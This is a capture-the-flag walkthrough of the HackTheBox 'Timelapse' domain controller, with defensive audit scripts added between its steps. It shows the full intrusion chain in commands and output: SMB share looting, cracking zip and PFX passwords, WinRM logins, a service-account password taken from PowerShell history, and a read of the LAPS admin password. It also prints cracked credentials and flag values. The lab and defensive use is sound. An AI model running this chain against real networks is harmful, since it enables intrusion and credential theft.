Service overview

The machine's IP address is 10.10.11.152. Let's look at the nmap output:

$ nmap -sC -sT -p1-65535 -Pn -oN 10.10.11.152 10.10.11.152   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 13:42 EDT
Nmap scan report for 10.10.11.152
Host is up (0.059s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2023-07-26T01:45:06+00:00; +8h00m00s from scanner time.
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49696/tcp open  unknown
58200/tcp open  unknown

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-07-26T01:45:06
|_  start_date: N/A

Nmap done: 1 IP address (1 host up) scanned in 228.59 seconds 

Add the domain to /etc/hosts:

$ sudo nano /etc/hosts
10.10.11.152 timelapse.htb dc01.timelapse.htb
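Three things in that scan deserve a note before moving on: the Kerberos, LDAP and Global Catalog ports together identify a domain controller; the certificate on the WinRM/HTTPS listener had already expired at scan time (valid until 2022-10-25, scanned on 2023-07-25); and the reported clock skew of almost eight hours is far beyond the five-minute tolerance Kerberos allows. As an added example, not part of the original writeup, the Python script below parses an nmap -oN report of this shape and emits those findings. The sample input is a constructed excerpt of the scan output above; the function names, the DC_PORTS table and the skew threshold are this example's own choices.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -oN output shown above, trimmed to the
# lines the checks below need.
SAMPLE_NMAP = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 13:42 EDT
Nmap scan report for 10.10.11.152
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
389/tcp   open  ldap
445/tcp   open  microsoft-ds
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
5986/tcp  open  wsmans
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)
START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2} \d{2}:\d{2})", re.M)
NOT_AFTER_RE = re.compile(r"Not valid after:\s+(\S+)")
SKEW_RE = re.compile(r"clock-skew: mean: (-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?,")

# Ports whose combination identifies an Active Directory domain controller.
DC_PORTS = {88: "Kerberos", 389: "LDAP", 3268: "Global Catalog"}
KERBEROS_MAX_SKEW_S = 5 * 60  # default Kerberos clock tolerance


def parse_nmap(text):
    """Extract open ports, scan time, certificate expiry and clock skew."""
    report = {
        "open_ports": {int(p): svc for p, svc in PORT_RE.findall(text)},
        "scan_time": None,
        "cert_not_after": None,
        "clock_skew_s": None,
    }
    m = START_RE.search(text)
    if m:
        report["scan_time"] = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M")
    m = NOT_AFTER_RE.search(text)
    if m:
        report["cert_not_after"] = datetime.fromisoformat(m.group(1))
    m = SKEW_RE.search(text)
    if m:
        sign, h, mi, s = m.groups()
        secs = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
        report["clock_skew_s"] = -secs if sign else secs
    return report


def assess(report):
    """Return the findings a defender would act on."""
    findings = []
    present = [name for port, name in DC_PORTS.items() if port in report["open_ports"]]
    if len(present) == len(DC_PORTS):
        findings.append("host exposes %s: domain controller role" % ", ".join(present))
    if (report["cert_not_after"] and report["scan_time"]
            and report["cert_not_after"] < report["scan_time"]):
        findings.append("TLS certificate reported by the scan expired on %s"
                        % report["cert_not_after"].date())
    skew = report["clock_skew_s"]
    if skew is not None and abs(skew) > KERBEROS_MAX_SKEW_S:
        findings.append("clock skew of %d s exceeds the Kerberos tolerance of %d s"
                        % (abs(skew), KERBEROS_MAX_SKEW_S))
    return findings


if __name__ == "__main__":
    for line in assess(parse_nmap(SAMPLE_NMAP)):
        print("-", line)
```

Run against a saved -oN file, the same two functions turn a raw scan into a short list of remediation items (renew the listener certificate, fix time synchronisation).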

Samba

With smbclient we can gather additional information about which network shares are exposed.

$ smbclient -N -L 10.10.11.152 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We could not get access to the ADMIN$ and C$ shares, but we can read Shares.

$ smbclient -N \\\\10.10.11.152\\ADMIN$
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\\\10.10.11.152\\C$    
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\\\10.10.11.152\\Shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2463125 blocks available

There is a winrm_backup.zip in the Dev directory.

smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 2463125 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (10.9 KiloBytes/sec) (average 10.9 KiloBytes/sec)

The HelpDesk directory holds the LAPS (Local Administrator Password Solution) installer and its documentation; LAPS is used to rotate local administrator passwords.

smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx     A    72683  Mon Oct 25 10:57:44 2021

                6367231 blocks of size 4096. 2463125 blocks available

ZIP archive

The archive is password-protected. Let's try to recover the password by brute force.

$ zip2john winrm_backup.zip > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt   
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2023-07-25 14:01) 2.702g/s 9387Kp/s 9387Kc/s 9387KC/s suzyqzb..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Let's use the recovered password, supremelegacy.

$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

PFX file

The extracted file legacyy_dev_auth.pfx is a PKCS#12 container holding certificates and a private key. This article explains how to unpack it, but a password is required.

$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -nodes -nocerts 
Enter Import Password:
Can't read Password

Let's try brute force again.

$ pfx2john legacyy_dev_auth.pfx > hash_pfx
$ john hash_pfx --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:49 DONE (2023-07-25 14:07) 0.02040g/s 65953p/s 65953c/s 65953C/s thumper1990..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Dump the private key, and then the certificate, using the password thuglegacy:

$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -nodes -nocerts -out legacyy_dev_auth.key
Enter Import Password:
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
PKCS7 Data
Certificate bag
$ openssl pkcs12 -info -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000
PKCS7 Data
Certificate bag
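The `MAC: sha1, Iteration 2000` line above is what decided how fast the offline guessing ran: john's pfx format (note the `mac-type` cost in its output) derives a key from each candidate password with that many iterations and checks it against the file's MAC, so a low iteration count and SHA-1 make every guess cheap. As an added example, not code from the writeup, here is a stdlib-only Python script that reads the MacData section of a PKCS#12 file and grades it against a policy threshold. Because a real PFX cannot be embedded here, the script builds a constructed skeleton (version, empty authSafe, MacData) with its own DER helpers; `inspect_pfx` works on the bytes of any real `.pfx` read from disk as well. `MIN_MAC_ITERATIONS`, `WEAK_MAC_DIGESTS` and the function names are this example's choices.

```python
# Minimal DER helpers: enough to build a constructed PFX skeleton and to
# read the MacData that offline password-guessing tools verify against.
OID_SHA1 = bytes.fromhex("2b0e03021a")               # 1.3.14.3.2.26
OID_SHA256 = bytes.fromhex("608648016503040201")     # 2.16.840.1.101.3.4.2.1
OID_PKCS7_DATA = bytes.fromhex("2a864886f70d010701") # 1.2.840.113549.1.7.1
OID_NAMES = {"1.3.14.3.2.26": "sha1", "2.16.840.1.101.3.4.2.1": "sha256"}

# Policy thresholds chosen for this example; tune them to your own standard.
MIN_MAC_ITERATIONS = 100_000
WEAK_MAC_DIGESTS = {"sha1"}


def der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body


def der_int(v):
    # The extra byte keeps the sign bit clear for non-negative values.
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def read_tlv(buf, pos):
    """Return (tag, body, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def build_sample_pfx(mac_oid, iterations, salt_len=20, digest_len=20):
    """Constructed PFX skeleton: version 3, an empty authSafe and MacData.
    The key and certificate bags are omitted; only the MacData matters here."""
    auth_safe = tlv(0x30, tlv(0x06, OID_PKCS7_DATA) + tlv(0xA0, tlv(0x04, b"\x30\x00")))
    alg_id = tlv(0x30, tlv(0x06, mac_oid) + b"\x05\x00")          # AlgorithmIdentifier
    digest_info = tlv(0x30, alg_id + tlv(0x04, b"\x00" * digest_len))
    mac_data = tlv(0x30, digest_info + tlv(0x04, b"\x00" * salt_len) + der_int(iterations))
    return tlv(0x30, der_int(3) + auth_safe + mac_data)


def inspect_pfx(pfx):
    """Read the MAC digest, salt length and iteration count, i.e. what
    'openssl pkcs12 -info' prints on its 'MAC:' lines."""
    _, body, _ = read_tlv(pfx, 0)                 # PFX ::= SEQUENCE
    _, _version, pos = read_tlv(body, 0)          # version INTEGER
    _, _auth_safe, pos = read_tlv(body, pos)      # authSafe ContentInfo
    if pos >= len(body):
        return None                               # no MacData at all
    _, mac_data, _ = read_tlv(body, pos)          # MacData ::= SEQUENCE
    _, digest_info, pos = read_tlv(mac_data, 0)   # mac DigestInfo
    _, salt, pos = read_tlv(mac_data, pos)        # macSalt OCTET STRING
    iterations = 1                                # ASN.1 DEFAULT when absent
    if pos < len(mac_data):
        _, it, _ = read_tlv(mac_data, pos)        # iterations INTEGER
        iterations = int.from_bytes(it, "big")
    _, alg_id, _ = read_tlv(digest_info, 0)
    _, oid, _ = read_tlv(alg_id, 0)
    name = decode_oid(oid)
    return {"mac_alg": OID_NAMES.get(name, name), "salt_len": len(salt),
            "iterations": iterations}


def assess(info):
    if info is None:
        return ["no MacData: file integrity is not tied to the password"]
    findings = []
    if info["mac_alg"] in WEAK_MAC_DIGESTS:
        findings.append("MAC digest %s is weak" % info["mac_alg"])
    if info["iterations"] < MIN_MAC_ITERATIONS:
        findings.append("only %d KDF iterations (policy minimum %d)"
                        % (info["iterations"], MIN_MAC_ITERATIONS))
    return findings


if __name__ == "__main__":
    print(assess(inspect_pfx(build_sample_pfx(OID_SHA1, 2000))))
```

Newer OpenSSL can export with stronger parameters (`openssl pkcs12 -export -macalg sha256 -iter 600000 -keypbe AES-256-CBC -certpbe AES-256-CBC ...`), which slows each guess down considerably; a file protected by a wordlist password still falls, so the export password itself remains the main control, and private keys should not sit in shares readable without authentication at all.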

WinRM

Let's try to connect with evil-winrm using the recovered private key and certificate:

$ evil-winrm -i timelapse.htb -S -c legacyy_dev_auth.crt -k legacyy_dev_auth.key 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents>

User flag

We can grab the user flag right away.

*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls

    Directory: C:\Users\legacyy\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/25/2023   7:25 AM             34 user.txt

*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address   . . : dead:beef::ac
   IPv6 Address   . . : dead:beef::6de4:6869:a7ce:53e1
   Link-local IPv6 Address  . . : fe80::6de4:6869:a7ce:53e1%13
   IPv4 Address   . . : 10.10.11.152
   Subnet Mask    . . : 255.255.254.0
   Default Gateway    : fe80::250:56ff:feb9:935a%13
                                       10.10.10.2
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
8af4ec585761b0df90e7de96437b70a1


Privilege escalation

Upload winPEAS:

*Evil-WinRM* PS C:\Users\legacyy\Documents> upload winPEAS.bat
                                        
Info: Uploading /home/user/htb/timelapse/winPEAS.bat to C:\Users\legacyy\Documents\winPEAS.bat
                                        
Data: 48236 bytes of 48236 bytes copied
                                        
Info: Upload successful!

PowerShell history:

PS default transcript history

Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)  10,086,412,288 bytes free
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

We get the credentials of the svc_deploy account: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV. Let's use evil-winrm again to connect:

$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
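The PSReadLine history file that winPEAS pointed at is a classic place for credentials to leak: the block above holds a reusable password in clear text, the account it belongs to, and session options that switch off certificate validation for the connection. As an added example (not code from the writeup), the Python checker below scans PSReadLine history text for exactly these patterns, reports the line numbers and redacts the secret. The sample history is constructed with a placeholder password, and the check list and function names are this example's own.

```python
import re

# Constructed sample in the shape of ConsoleHost_history.txt above; the
# password is a placeholder, not the machine's real one.
SAMPLE_HISTORY = """\
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sample-P@ss-not-real' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# (label, pattern, redact the captured value?)
CHECKS = [
    ("plaintext secret passed to ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<value>.+?)\1\s+-AsPlainText", re.I),
     True),
    ("PSCredential object created for account",
     re.compile(r"PSCredential\s*\(\s*['\"](?P<value>[^'\"]+)['\"]", re.I),
     False),
    ("certificate validation disabled via session options",
     re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I),
     False),
]


def redact(value):
    """Keep two characters so a reviewer can match the finding to the source."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_history(text):
    """Return one finding per (line, check) hit, with secrets redacted."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern, must_redact in CHECKS:
            m = pattern.search(line)
            if not m:
                continue
            value = m.groupdict().get("value")
            if value and must_redact:
                value = redact(value)
            findings.append({"line": number, "finding": label, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print("line %(line)d: %(finding)s %(value)s" % {**f, "value": f["value"] or ""})
```

The same checks can be run over copies of ConsoleHost_history.txt collected from user profiles during a review. Where interactive credential handling cannot be avoided, `Set-PSReadLineOption -HistorySaveStyle SaveNothing` stops PSReadLine from writing the file at all, and a service account password found this way should be rotated rather than just deleted from the file.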

Further escalation

Let's check what the svc_deploy user can do:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/25/2023 7:40:55 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

This user turns out to be a member of the LAPS_Readers group, so we can read the ms-Mcs-AdmPwd attribute (https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/laps).

$ git clone https://github.com/ztrhgf/LAPS.git
Cloning into 'LAPS'...
remote: Enumerating objects: 51, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 51 (delta 6), reused 4 (delta 0), pack-reused 37
Receiving objects: 100% (51/51), 504.03 KiB | 2.09 MiB/s, done.
Resolving deltas: 100% (19/19), done.
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload LAPS\AdmPwd.PS
                                        
Info: Uploading /home/user/htb/timelapse/LAPS/AdmPwd.PS to C:\Users\legacyy\Documents\AdmPwd.PS
                                        
Data: 53980 bytes of 53980 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> cd AdmPwd.PS
*Evil-WinRM* PS C:\Users\svc_deploy\Documents\AdmPwd.PS> get-admpwdpassword -computername dc01 | select password

Password
--------
5r4]VTk[#)[4A)pQ{[0s9Jrh

This is the LAPS-managed local Administrator password of dc01: administrator:5r4]VTk[#)[4A)pQ{[0s9Jrh.
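LAPS protects the local Administrator password only as well as the DACL on the computer object (or its OU) protects the confidential ms-Mcs-AdmPwd attribute: any principal holding "all extended rights" or full control there can read it, which is what the LAPS_Readers membership comes down to and what the AdmPwd.PS cmdlet Find-AdmPwdExtendedRights reports. As an added example, not the writeup's or the LAPS project's code, the Python function below performs that audit on an SDDL string: it lists every allow ACE carrying the control-access right, either unscoped (all extended rights) or scoped to the ms-Mcs-AdmPwd schema GUID, and drops principals that also have a matching deny ACE. The SDDL, the SIDs and the GUID are constructed; the real schemaIDGUID of ms-Mcs-AdmPwd differs per forest and must be read from the schema partition.

```python
import re

# Placeholder: look the real value up in the schema partition of your forest.
ASSUMED_ADMPWD_GUID = "11111111-2222-3333-4444-555555555555"

# Constructed DACL of an OU holding computer objects. CI = inherit to children.
SAMPLE_OU_SDDL = (
    "O:DAG:DAD:"
    "(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"                           # full control
    "(A;CI;CR;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"       # all extended rights
    "(A;CI;LCRPLORC;;;AU)"                                             # list/read only
    "(OA;CI;CR;11111111-2222-3333-4444-555555555555;;"
    "S-1-5-21-1111111111-2222222222-3333333333-1106)"                  # scoped to one attribute
    "(A;CI;RP;;;DU)"                                                   # read non-confidential properties
)

ACE_RE = re.compile(
    r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[^;]*);"
    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]+)\)")
CONTROL_ACCESS = 0x100         # ADS_RIGHT_DS_CONTROL_ACCESS
GENERIC_ALL = 0x10000000       # ADS_RIGHT_GENERIC_ALL
WELL_KNOWN = {"DA": "Domain Admins", "EA": "Enterprise Admins", "BA": "Builtin Administrators",
              "AU": "Authenticated Users", "DU": "Domain Users", "SY": "Local System"}


def grants_extended_rights(rights):
    """True if the SDDL rights field includes control access or generic all."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(tokens & {"CR", "GA"})


def covers_admpwd(ace, admpwd_guid):
    """Reason string if this ACE reaches ms-Mcs-AdmPwd, else None."""
    if not grants_extended_rights(ace["rights"]):
        return None
    if ace["obj"] == "":
        return "all extended rights"
    if ace["obj"].lower() == admpwd_guid.lower():
        return "extended right scoped to ms-Mcs-AdmPwd"
    return None


def find_admpwd_readers(sddl, admpwd_guid):
    """Return {sid: reason} for principals able to read the LAPS password.
    Inheritance from parent containers is not resolved here: feed in the
    effective DACL of the computer object or of the OU directly above it."""
    aces = [m.groupdict() for m in ACE_RE.finditer(sddl)]
    denied = {a["sid"] for a in aces
              if a["type"] in ("D", "OD") and covers_admpwd(a, admpwd_guid)}
    readers = {}
    for ace in aces:
        if ace["type"] not in ("A", "OA") or ace["sid"] in denied:
            continue
        reason = covers_admpwd(ace, admpwd_guid)
        if reason:
            readers[ace["sid"]] = reason
    return readers


def describe(sid):
    return WELL_KNOWN.get(sid, sid)


if __name__ == "__main__":
    for sid, why in find_admpwd_readers(SAMPLE_OU_SDDL, ASSUMED_ADMPWD_GUID).items():
        print("%-60s %s" % (describe(sid), why))
```

The SDDL to feed in comes from `(Get-Acl "AD:\<DN>").Sddl` or from dsacls. Every principal on the resulting list that is not an administrator of the tier those computers belong to should lose the right, and reads of the attribute on domain controllers deserve an audit entry, since a single group membership such as LAPS_Readers is enough to turn any of its members into the local Administrator of every covered host.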

Once again we use evil-winrm to connect:

$ evil-winrm -i 10.10.11.152 -u administrator -p '5r4]VTk[#)[4A)pQ{[0s9Jrh' -S
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Root flag

On HackTheBox the flag is usually in the administrator's directory, but this time it is located at C:\Users\TRX\Desktop\root.txt.

*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> ls

    Directory: C:\Users\TRX\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/25/2023   7:25 AM             34 root.txt

*Evil-WinRM* PS C:\Users\TRX\Desktop> ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address   . . : dead:beef::ac
   IPv6 Address   . . : dead:beef::6de4:6869:a7ce:53e1
   Link-local IPv6 Address  . . : fe80::6de4:6869:a7ce:53e1%13
   IPv4 Address   . . : 10.10.11.152
   Subnet Mask    . . : 255.255.254.0
   Default Gateway    : fe80::250:56ff:feb9:935a%13
                                       10.10.10.2
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
6b862d432c76c25e4e999d167ddd63d9
